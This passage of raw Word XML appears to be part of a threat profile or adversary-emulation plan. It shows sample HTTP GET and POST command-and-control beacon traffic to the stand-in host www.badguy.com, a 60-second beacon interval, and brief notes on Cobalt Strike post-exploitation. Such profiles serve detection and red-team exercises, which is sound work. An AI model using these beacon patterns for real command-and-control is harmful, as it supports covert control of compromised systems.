            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          </w:rPr>
          <w:t>www.badguy.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C23C7B8" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Sample HTTP GET Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1B369" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>GET /index.html HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>en-US,en;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=0.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Host: www.badguy.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Proxy-Connection: Keep-Alive</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Cookie: session=sE5QGSAMTumuA/3mNmqe5g==</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Trident/7.0; rv:11.0) like Gecko</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Cache-Control: no-cache</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Type: text/html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Vary: Accept-Encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Server: IIS 5.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Length: 218</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&lt;html&gt;&lt;head&gt;&lt;meta http-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>equiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>="refresh" content=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>="http://www.badguy.com"&gt;&lt;title&gt;Bad Guy Website&lt;/title&gt;&lt;/html&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>fylWlO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/d4uBN6b0hPlhUDYRcjdjaifkaukstXQZwO3PZpCzTTR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>FTERSAITNWz2xTNndMcZgPg==</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="333CAD9E" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Sample HTTP POST Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DD6482" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>POST /contact HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Accept: text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>html,application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>xhtml+xml,application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>xml;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=0.9,*/*;q=0.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Host: www.badguy.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Cookie: session=NzQ4NTU=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Length: 41</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;Trident/7.0; rv:11.0) like Gecko</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>action=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Submit&amp;data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=jdagislaga-p0Zw</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Cache-Control: no-cache</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Type: application/octet-stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Server: IIS 5.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Length: 40</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>yF8u8YkdbbWNGWm5gUgaalgOOSfZDX2lnQl5qZEF</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D65AE75" w14:textId="77777777" w:rsidR="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>C2 OVERVIEW</w:t>
      </w:r>
      <w:hyperlink r:id="rId106" w:anchor="c2-overview" w:tooltip="Direct link to heading" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40E2B989" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>HTTP Traffic on TCP port 80 connecting to </w:t>
      </w:r>
      <w:hyperlink r:id="rId107" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          </w:rPr>
          <w:t>www.badguy.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> every 60 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F4A080" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TTPS (ENUMERATION, DELIVERY, LATERAL MOVEMENT, PRIVILEGE ESCALATION, ETC.)</w:t>
      </w:r>
      <w:hyperlink r:id="rId108" w:anchor="ttps-enumeration-delivery-lateral-movement-privilege-escalation-etc" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47BE1F46" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">POST-exploitation via Cobalt Strike commands. Enumeration and lateral movement via Cobalt Strike and native Windows commands. Privilege escalation limited and determined </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>POST-exploitation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C292ED" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXPLOITATION</w:t>
      </w:r>
      <w:hyperlink r:id="rId109" w:anchor="exploitation" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A8B676A" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Nothing specific. Operator deploys during after initial access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110B14C5" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PERSISTENCE</w:t>
      </w:r>
      <w:hyperlink r:id="rId110" w:anchor="persistence" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
